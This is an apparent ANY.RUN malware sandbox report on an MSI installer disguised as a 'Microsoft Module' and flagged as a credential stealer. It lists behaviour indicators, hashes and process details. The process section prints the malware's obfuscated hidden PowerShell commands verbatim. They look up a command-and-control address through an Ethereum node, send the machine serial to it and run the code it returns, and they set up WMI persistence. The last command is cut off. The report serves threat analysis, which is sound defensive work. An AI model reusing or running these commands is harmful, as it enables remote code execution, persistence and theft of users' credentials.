File name:

2cee9b72969beb59dd8441a637fdc8275afe13dfb6356e24a1daa1f77c555639.bin

Full analysis: https://app.any.run/tasks/b442f660-f056-4e23-8ade-44eaeedf8e33
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: June 21, 2025, 06:41:15
OS: Windows 11 Professional (build: 22000, 64 bit)
Tags:
generated-doc
stealer
g0njxa
Indicators:
MIME: application/x-msi
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Microsoft Module, Author: Aurelia Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Module., Template: Intel;1033, Revision Number: {FC289CCF-5EA6-487A-B815-0F36A5DE0CED}, Create Time/Date: Thu Jun 12 13:23:30 2025, Last Saved Time/Date: Thu Jun 12 13:23:30 2025, Number of Pages: 200, Number of Words: 10, Name of Creating Application: Windows Installer XML Toolset (3.14.1.8722), Security: 2
MD5:

117C07E910B87719CB9DE98E5A2384F8

SHA1:

12E415851E676CCD90FDDC770D2171A7AD84D8ED

SHA256:

2CEE9B72969BEB59DD8441A637FDC8275AFE13DFB6356E24A1DAA1F77C555639

SSDEEP:

98304:xUk2zSad/lcnfl/7/zPYohm3ImZ5wL/8ykYCUNz1Temrm5f5fyHz5haUcwC6Wxu7:7AZeq4JIZiOdO0

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 3196)
      • powershell.exe (PID: 2964)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3196)
      • powershell.exe (PID: 1684)
      • powershell.exe (PID: 320)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 1996)
      • powershell.exe (PID: 2376)
      • powershell.exe (PID: 6516)
      • powershell.exe (PID: 6696)
      • powershell.exe (PID: 2020)
      • powershell.exe (PID: 616)

    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 3196)

    • Actions looks like stealing of personal data

      • powershell.exe (PID: 504)
      • powershell.exe (PID: 2020)

    • Steals credentials from Web Browsers

      • powershell.exe (PID: 2020)

  • SUSPICIOUS

    • Reads the Internet Settings

      • msiexec.exe (PID: 4576)
      • powershell.exe (PID: 3196)

    • Executes as Windows Service

      • VSSVC.exe (PID: 5848)
      • WmiApSrv.exe (PID: 1668)
      • WmiApSrv.exe (PID: 2084)
      • WmiApSrv.exe (PID: 88)

    • Reads the Windows owner or organization settings

      • msiexec.exe (PID: 1176)

    • The process executes Powershell scripts

      • msiexec.exe (PID: 1176)
      • powershell.exe (PID: 3196)

    • Starts process via Powershell

      • powershell.exe (PID: 3196)

    • Starts POWERSHELL.EXE for commands execution

      • msiexec.exe (PID: 1176)
      • powershell.exe (PID: 3196)
      • powershell.exe (PID: 2964)
      • powershell.exe (PID: 504)

    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 2964)
      • powershell.exe (PID: 504)

    • Base64-obfuscated command line is found

      • powershell.exe (PID: 2964)
      • powershell.exe (PID: 504)

    • Application launched itself

      • powershell.exe (PID: 2964)
      • powershell.exe (PID: 3196)
      • powershell.exe (PID: 504)
      • updater.exe (PID: 4720)

    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 2964)

    • Executes script without checking the security policy

      • powershell.exe (PID: 1684)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 320)
      • powershell.exe (PID: 2376)
      • powershell.exe (PID: 1996)
      • powershell.exe (PID: 6516)
      • powershell.exe (PID: 6696)
      • powershell.exe (PID: 2020)
      • powershell.exe (PID: 616)

    • Executed via WMI

      • powershell.exe (PID: 320)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 2020)
      • powershell.exe (PID: 616)

    • Converts a specified value to a byte (POWERSHELL)

      • powershell.exe (PID: 320)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 2020)
      • powershell.exe (PID: 616)

    • The process creates files with name similar to system file names

      • powershell.exe (PID: 320)

    • The process executes via Task Scheduler

      • default-browser-agent.exe (PID: 1036)
      • updater.exe (PID: 4720)

    • Loads DLL from Mozilla Firefox

      • default-browser-agent.exe (PID: 1036)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 6800)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 504)
      • powershell.exe (PID: 2376)
      • powershell.exe (PID: 6516)
      • powershell.exe (PID: 6696)
      • powershell.exe (PID: 1996)

    • Executable content was dropped or overwritten

      • csc.exe (PID: 6800)

    • Cryptography encrypted command line is found

      • powershell.exe (PID: 2376)
      • powershell.exe (PID: 1996)
      • powershell.exe (PID: 6696)
      • powershell.exe (PID: 6516)

  • INFO

    • Reads security settings of Internet Explorer

      • msiexec.exe (PID: 4576)

    • The sample compiled with english language support

      • msiexec.exe (PID: 4576)
      • msiexec.exe (PID: 1176)

    • Reads the software policy settings

      • msiexec.exe (PID: 4576)
      • msiexec.exe (PID: 1176)

    • Checks proxy server information

      • msiexec.exe (PID: 4576)

    • Creates files or folders in the user directory

      • msiexec.exe (PID: 4576)

    • Checks supported languages

      • msiexec.exe (PID: 1176)
      • default-browser-agent.exe (PID: 1036)
      • cvtres.exe (PID: 4092)
      • csc.exe (PID: 6800)
      • updater.exe (PID: 2528)
      • updater.exe (PID: 4720)

    • Reads the computer name

      • msiexec.exe (PID: 1176)
      • updater.exe (PID: 4720)

    • Manages system restore points

      • SrTasks.exe (PID: 7004)

    • Reads the machine GUID from the registry

      • msiexec.exe (PID: 1176)
      • csc.exe (PID: 6800)

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 1176)

    • Create files in a temporary directory

      • msiexec.exe (PID: 1176)

    • Disables trace logs

      • powershell.exe (PID: 320)
      • powershell.exe (PID: 504)
      • powershell.exe (PID: 2020)
      • powershell.exe (PID: 616)

    • Reads Windows Product ID

      • powershell.exe (PID: 320)

    • Application launched itself

      • firefox.exe (PID: 3544)
      • firefox.exe (PID: 2916)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 504)
      • powershell.exe (PID: 2020)

    • Process checks whether UAC notifications are on

      • updater.exe (PID: 4720)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 2020)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.msi | Microsoft Installer (100)

EXIF

FlashPix

CodePage: Windows Latin 1 (Western European)
Title: Installation Database
Subject: Microsoft Module
Author: Aurelia Corporation
Keywords: Installer
Comments: This installer database contains the logic and data required to install Microsoft Module.
Template: Intel;1033
RevisionNumber: {FC289CCF-5EA6-487A-B815-0F36A5DE0CED}
CreateDate: 2025:06:12 13:23:30
ModifyDate: 2025:06:12 13:23:30
Pages: 200
Words: 10
Software: Windows Installer XML Toolset (3.14.1.8722)
Security: Read-only recommended
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
166
Monitored processes
42
Malicious processes
11
Suspicious processes
1

Behavior graph

Click at the process to see the details
start msiexec.exe msiexec.exe vssvc.exe no specs srtasks.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs wmiapsrv.exe no specs default-browser-agent.exe no specs firefox.exe no specs firefox.exe firefox.exe no specs powershell.exe conhost.exe no specs tiworker.exe wmiapsrv.exe no specs wmiapsrv.exe no specs powershell.exe conhost.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs powershell.exe no specs updater.exe no specs updater.exe no specs powershell.exe conhost.exe no specs robocopy.exe no specs robocopy.exe no specs robocopy.exe no specs robocopy.exe no specs robocopy.exe no specs robocopy.exe no specs robocopy.exe no specs robocopy.exe no specs powershell.exe conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
88C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\System32\wbem\WmiApSrv.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
WMI Performance Reverse Adapter
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmiapsrv.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\psapi.dll
c:\windows\system32\loadperf.dll
320powershell -nop -w hidden -enc SQBFAFgAKABJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAIgBoAHQAdABwAHMAOgAvAC8AJAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACgAKABJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGUAdABoAGUAcgBlAHUAbQAuAHAAdQBiAGwAaQBjAG4AbwBkAGUALgBjAG8AbQAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgAgAC0AQgBvAGQAeQAgACcAewAiAGoAcwBvAG4AcgBwAGMAIgA6ACAAIgAyAC4AMAAiACwAIAAiAG0AZQB0AGgAbwBkACIAOgAgACIAZQB0AGgAXwBnAGUAdABTAHQAbwByAGEAZwBlAEEAdAAiACwAIAAiAGkAZAAiADoAIAAxACwAIAAiAHAAYQByAGEAbQBzACIAOgAgAFsAIgAwAHgARABCADgANQA2AEQANQAzADgAMwA3ADQAQgBjADEAZAA5AEQAOABlADgAYQAyAGYAMwBkAGIAMAA1ADEAOQBCADcAZAA0ADYANwA3AEEARAAiACwAIAAiADAAIgAsACAAIgBsAGEAdABlAHMAdAAiAF0AfQAnACkALgByAGUAcwB1AGwAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAMgAsACAANgAyACkAIAAtAHMAcABsAGkAdAAgACcAKAAuAHsAMgB9ACkAJwAgAC0AbgBlACAAJwAnACAALQBuAGUAIAAnADAAMAAnACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAF8ALAAgADEANgApACAAfQApACkAKQAvAGEAdQB0AGgAIgAgACAALQBNAGUAdABoAG8AZAAgAFAATwBTAFQAIAAtAEIAbwBkAHkAIAAoACIAewAiACIAcwBlAHIAaQBhAGwAIgAiADoAIAAiACIAJAAoACgARwBlAHQALQBDAGkAbQBJAG4AcwB0AGEAbgBjAGUAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgApACIAIgAsACAAIgAiAHAAYwBpAGQAIgAiADoAIAAiACIAMgAyADYAMwBhAHIAdAAiACIAfQAiACkAIAAtAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
504powershell -nop -w hidden -enc SQBFAFgAKABJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAIgBoAHQAdABwAHMAOgAvAC8AJAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACgAKABJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGUAdABoAGUAcgBlAHUAbQAuAHAAdQBiAGwAaQBjAG4AbwBkAGUALgBjAG8AbQAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgAgAC0AQgBvAGQAeQAgACcAewAiAGoAcwBvAG4AcgBwAGMAIgA6ACAAIgAyAC4AMAAiACwAIAAiAG0AZQB0AGgAbwBkACIAOgAgACIAZQB0AGgAXwBnAGUAdABTAHQAbwByAGEAZwBlAEEAdAAiACwAIAAiAGkAZAAiADoAIAAxACwAIAAiAHAAYQByAGEAbQBzACIAOgAgAFsAIgAwAHgARABCADgANQA2AEQANQAzADgAMwA3ADQAQgBjADEAZAA5AEQAOABlADgAYQAyAGYAMwBkAGIAMAA1ADEAOQBCADcAZAA0ADYANwA3AEEARAAiACwAIAAiADAAIgAsACAAIgBsAGEAdABlAHMAdAAiAF0AfQAnACkALgByAGUAcwB1AGwAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAMgAsACAANgAyACkAIAAtAHMAcABsAGkAdAAgACcAKAAuAHsAMgB9ACkAJwAgAC0AbgBlACAAJwAnACAALQBuAGUAIAAnADAAMAAnACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAF8ALAAgADEANgApACAAfQApACkAKQAvAGEAdQB0AGgAIgAgACAALQBNAGUAdABoAG8AZAAgAFAATwBTAFQAIAAtAEIAbwBkAHkAIAAoACIAewAiACIAcwBlAHIAaQBhAGwAIgAiADoAIAAiACIAJAAoACgARwBlAHQALQBDAGkAbQBJAG4AcwB0AGEAbgBjAGUAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgApACIAIgAsACAAIgAiAHAAYwBpAGQAIgAiADoAIAAiACIAMgAyADYAMwBhAHIAdAAiACIAfQAiACkAIAAtAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
616powershell -nop -w hidden -enc SQBFAFgAKABJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAIgBoAHQAdABwAHMAOgAvAC8AJAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACgAKABJAG4AdgBvAGsAZQAtAFIAZQBzAHQATQBlAHQAaABvAGQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGUAdABoAGUAcgBlAHUAbQAuAHAAdQBiAGwAaQBjAG4AbwBkAGUALgBjAG8AbQAgAC0ATQBlAHQAaABvAGQAIABQAE8AUwBUACAALQBDAG8AbgB0AGUAbgB0AFQAeQBwAGUAIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgAgAC0AQgBvAGQAeQAgACcAewAiAGoAcwBvAG4AcgBwAGMAIgA6ACAAIgAyAC4AMAAiACwAIAAiAG0AZQB0AGgAbwBkACIAOgAgACIAZQB0AGgAXwBnAGUAdABTAHQAbwByAGEAZwBlAEEAdAAiACwAIAAiAGkAZAAiADoAIAAxACwAIAAiAHAAYQByAGEAbQBzACIAOgAgAFsAIgAwAHgARABCADgANQA2AEQANQAzADgAMwA3ADQAQgBjADEAZAA5AEQAOABlADgAYQAyAGYAMwBkAGIAMAA1ADEAOQBCADcAZAA0ADYANwA3AEEARAAiACwAIAAiADAAIgAsACAAIgBsAGEAdABlAHMAdAAiAF0AfQAnACkALgByAGUAcwB1AGwAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAMgAsACAANgAyACkAIAAtAHMAcABsAGkAdAAgACcAKAAuAHsAMgB9ACkAJwAgAC0AbgBlACAAJwAnACAALQBuAGUAIAAnADAAMAAnACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAIABbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAF8ALAAgADEANgApACAAfQApACkAKQAvAGEAdQB0AGgAIgAgACAALQBNAGUAdABoAG8AZAAgAFAATwBTAFQAIAAtAEIAbwBkAHkAIAAoACIAewAiACIAcwBlAHIAaQBhAGwAIgAiADoAIAAiACIAJAAoACgARwBlAHQALQBDAGkAbQBJAG4AcwB0AGEAbgBjAGUAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgApACIAIgAsACAAIgAiAHAAYwBpAGQAIgAiADoAIAAiACIAMgAyADYAMwBhAHIAdAAiACIAfQAiACkAIAAtAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgACIAYQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AagBzAG8AbgAiACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1036"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task "308046B0AF4A39CB"C:\Program Files\Mozilla Firefox\default-browser-agent.exesvchost.exe
User:
admin
Company:
Mozilla Foundation
Integrity Level:
MEDIUM
Exit code:
0
Version:
136.0
Modules
Images
c:\program files\mozilla firefox\default-browser-agent.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcp_win.dll
1176C:\Windows\system32\msiexec.exe /VC:\Windows\System32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
1668C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\System32\wbem\WmiApSrv.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
WMI Performance Reverse Adapter
Exit code:
0
Version:
10.0.22000.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmiapsrv.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\psapi.dll
c:\windows\system32\loadperf.dll
1684"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -enc JAB1AHQAIAA9ACAARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIAByAG8AbwB0AFwAcwB1AGIAcwBjAHIAaQBwAHQAaQBvAG4AIAAtAEMAbABhAHMAcwAgAF8AXwBFAHYAZQBuAHQARgBpAGwAdABlAHIAIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACAAJABfAC4ATgBhAG0AZQAgAC0AZQBxACAAIgBXAGkAbgBVAHAAZABhAHQAZQBUAHIAaQBnAGcAZQByAF8AIgB9AAoAaQBmACgAJAB1AHQAIAAtAG4AZQAgACQAbgB1AGwAbAApAAoAewAKAAkAJAB1AHQAIAB8ACAAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAAKAH0ACgAKACQAZgBpAGwAdABlAHIAIAA9ACAAUwBlAHQALQBXAG0AaQBJAG4AcwB0AGEAbgBjAGUAIAAtAE4AYQBtAGUAcwBwAGEAYwBlACAAIgByAG8AbwB0AFwAcwB1AGIAcwBjAHIAaQBwAHQAaQBvAG4AIgAgAC0AQwBsAGEAcwBzACAAXwBfAEUAdgBlAG4AdABGAGkAbAB0AGUAcgAgAC0AQQByAGcAdQBtAGUAbgB0AHMAIABAAHsACgAJAE4AYQBtAGUAIAA9ACAAIgBXAGkAbgBVAHAAZABhAHQAZQBUAHIAaQBnAGcAZQByAF8AIgA7AAoACQBFAHYAZQBuAHQATgBhAG0AZQBzAHAAYQBjAGUAIAA9ACAAIgByAG8AbwB0AFwAYwBpAG0AdgAyACIAOwAKAAkAUQB1AGUAcgB5AEwAYQBuAGcAdQBhAGcAZQAgAD0AIAAiAFcAUQBMACIAOwAKAAkAUQB1AGUAcgB5ACAAPQAgACIAUwBFAEwARQBDAFQAIAAqACAARgBSAE8ATQAgAF8AXwBJAG4AcwB0AGEAbgBjAGUATQBvAGQAaQBmAGkAYwBhAHQAaQBvAG4ARQB2AGUAbgB0ACAAVwBJAFQASABJAE4AIAA2ADAAIABXAEgARQBSAEUAIABUAGEAcgBnAGUAdABJAG4AcwB0AGEAbgBjAGUAIABJAFMAQQAgACcAVwBpAG4AMwAyAF8AUABlAHIAZgBGAG8AcgBtAGEAdAB0AGUAZABEAGEAdABhAF8AUABlAHIAZgBPAFMAXwBTAHkAcwB0AGUAbQAnACIACgB9AAoACQAKACQAdQB0ACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAE4AYQBtAGUAcwBwAGEAYwBlACAAcgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuACAALQBDAGwAYQBzAHMAIABDAG8AbQBtAGEAbgBkAEwAaQBuAGUARQB2AGUAbgB0AEMAbwBuAHMAdQBtAGUAcgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAIAAkAF8ALgBOAGEAbQBlACAALQBlAHEAIAAiAFcAaQBuAFUAcABkAGEAdABlAEUAeABlAGMAIgB9AAoAaQBmACgAJAB1AHQAIAAtAG4AZQAgACQAbgB1AGwAbAApAAoAewAKAAkAJAB1AHQAIAB8ACAAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAAKAH0ACgAKACQAYwBvAG4AcwB1AG0AZQByACAAPQAgAFMAZQB0AC0AVwBtAGkASQBuAHMAdABhAG4AYwBlACAALQBOAGEAbQBlAHMAcABhAGMAZQAgACIAcgBvAG8AdABcAHMAdQBiAHMAYwByAGkAcAB0AGkAbwBuACIAIAAtAEMAbABhAHMAcwAgAEMAbwBtAG0AYQBuAGQATABpAG4AZQBFAHYAZQBuAHQAQwBvAG4AcwB1AG0AZQByACAALQBBAHIAZwB1AG0AZQBuAHQAcwAgAEAAewAKACAAIAAgACAATgBhAG0AZQAgAD0AIAAiAFcAaQBuAFUAcABkAGEAdABlAEUAeABlAGMAIgA7AAoAIAAgACAAIABDAG8AbQBtAGEAbgBkAEwAaQBuAGUAVABlAG0AcABsAGEAdABlACAAPQAgACIAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAHAAIAAtAHcAIABoAGkAZABkAGUAbgAgAC0AZQBuAGMAIABTAFEAQgBGAEEARgBnAEEASwBBAEIASgBBAEcANABBAGQAZwBCAHYAQQBHAHMAQQBaAFEAQQB0AEEARgBJAEEAWgBRAEIAegBBAEgAUQBBAFQAUQBCAGwAQQBIAFEAQQBhAEEAQgB2AEEARwBRAEEASQBBAEEAdABBAEYAVQBBAGMAZwBCAHAAQQBDAEEAQQBJAGcAQgBvAEEASABRAEEAZABBAEIAdwBBAEgATQBBAE8AZwBBAHYAQQBDADgAQQBKAEEAQQBvAEEARgBzAEEAVQB3AEIANQBBAEgATQBBAGQAQQBCAGwAQQBHADAAQQBMAGcAQgBVAEEARwBVAEEAZQBBAEIAMABBAEMANABBAFIAUQBCAHUAQQBHAE0AQQBiAHcAQgBrAEEARwBrAEEAYgBnAEIAbgBBAEYAMABBAE8AZwBBADYAQQBGAFUAQQBWAEEAQgBHAEEARABnAEEATABnAEIASABBAEcAVQBBAGQAQQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwA0AEEAWgB3AEEAbwBBAEMAZwBBAEsAQQBCAEoAQQBHADQAQQBkAGcAQgB2AEEARwBzAEEAWgBRAEEAdABBAEYASQBBAFoAUQBCAHoAQQBIAFEAQQBUAFEAQgBsAEEASABRAEEAYQBBAEIAdgBBAEcAUQBBAEkAQQBBAHQAQQBGAFUAQQBjAGcAQgBwAEEAQwBBAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBVAEEAZABBAEIAbwBBAEcAVQBBAGMAZwBCAGwAQQBIAFUAQQBiAFEAQQB1AEEASABBAEEAZABRAEIAaQBBAEcAdwBBAGEAUQBCAGoAQQBHADQAQQBiAHcAQgBrAEEARwBVAEEATABnAEIAagBBAEcAOABBAGIAUQBBAGcAQQBDADAAQQBUAFEAQgBsAEEASABRAEEAYQBBAEIAdgBBAEcAUQBBAEkAQQBCAFEAQQBFADgAQQBVAHcAQgBVAEEAQwBBAEEATABRAEIARABBAEcAOABBAGIAZwBCADAAQQBHAFUAQQBiAGcAQgAwAEEARgBRAEEAZQBRAEIAdwBBAEcAVQBBAEkAQQBBAGkAQQBHAEUAQQBjAEEAQgB3AEEARwB3AEEAYQBRAEIAagBBAEcARQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQQB2AEEARwBvAEEAYwB3AEIAdgBBAEcANABBAEkAZwBBAGcAQQBDADAAQQBRAGcAQgB2AEEARwBRAEEAZQBRAEEAZwBBAEMAYwBBAGUAdwBBAGkAQQBHAG8AQQBjAHcAQgB2AEEARwA0AEEAYwBnAEIAdwBBAEcATQBBAEkAZwBBADYAQQBDAEEAQQBJAGcAQQB5AEEAQwA0AEEATQBBAEEAaQBBAEMAdwBBAEkAQQBBAGkAQQBHADAAQQBaAFEAQgAwAEEARwBnAEEAYgB3AEIAawBBAEMASQBBAE8AZwBBAGcAQQBDAEkAQQBaAFEAQgAwAEEARwBnAEEAWAB3AEIAbgBBAEcAVQBBAGQAQQBCAFQAQQBIAFEAQQBiAHcAQgB5AEEARwBFAEEAWgB3AEIAbABBAEUARQBBAGQAQQBBAGkAQQBDAHcAQQBJAEEAQQBpAEEARwBrAEEAWgBBAEEAaQBBAEQAbwBBAEkAQQBBAHgAQQBDAHcAQQBJAEEAQQBpAEEASABBAEEAWQBRAEIAeQBBAEcARQBBAGIAUQBCAHoAQQBDAEkAQQBPAGcAQQBnAEEARgBzAEEASQBnAEEAdwBBAEgAZwBBAFIAQQBCAEMAQQBEAGcAQQBOAFEAQQAyAEEARQBRAEEATgBRAEEAegBBAEQAZwBBAE0AdwBBADMAQQBEAFEAQQBRAGcAQgBqAEEARABFAEEAWgBBAEEANQBBAEUAUQBBAE8AQQBCAGwAQQBEAGcAQQBZAFEAQQB5AEEARwBZAEEATQB3AEIAawBBAEcASQBBAE0AQQBBADEAQQBEAEUAQQBPAFEAQgBDAEEARABjAEEAWgBBAEEAMABBAEQAWQBBAE4AdwBBADMAQQBFAE